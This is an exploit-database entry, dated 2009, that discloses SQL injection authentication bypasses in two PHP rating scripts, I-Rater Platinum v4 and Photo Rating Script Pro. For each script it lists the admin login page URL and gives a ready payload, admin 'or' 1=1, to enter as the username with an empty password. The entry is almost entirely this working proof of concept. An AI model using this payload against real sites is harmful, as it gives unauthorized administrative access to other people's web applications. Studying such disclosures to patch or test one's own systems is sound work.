id: 5086
date: 04/20/2009
title: I-Rater Pro/Plantinum v4 (Auth Bypass) SQL Injection Vulnerability
author: Hakxer
cves: 

==================================================================
I-Rater Pro/Plantinum v4 (Auth Bypass) SQL Injection Vulnerability
==================================================================


################################################
###########  I-Rater Platinum V4 ###############
##### By : Hakxer
########## I-Rater Platinum V4 (Auth bypass) Sql injection

poc :

http://www.i-rater.com/platinumadmin.html

in username : admin 'or' 1=1
in password :
###############################

################################################
###########  Photo Rating Script Pro ###########
##### By : Hakxer
########## Photo Rating Script Pro (Auth bypass) Sql injection

poc :

http://www.i-rater.com/pro/admin/login.php

in username : admin 'or' 1=1
in password :
###############################



#  0day.today [2023-03-27]  #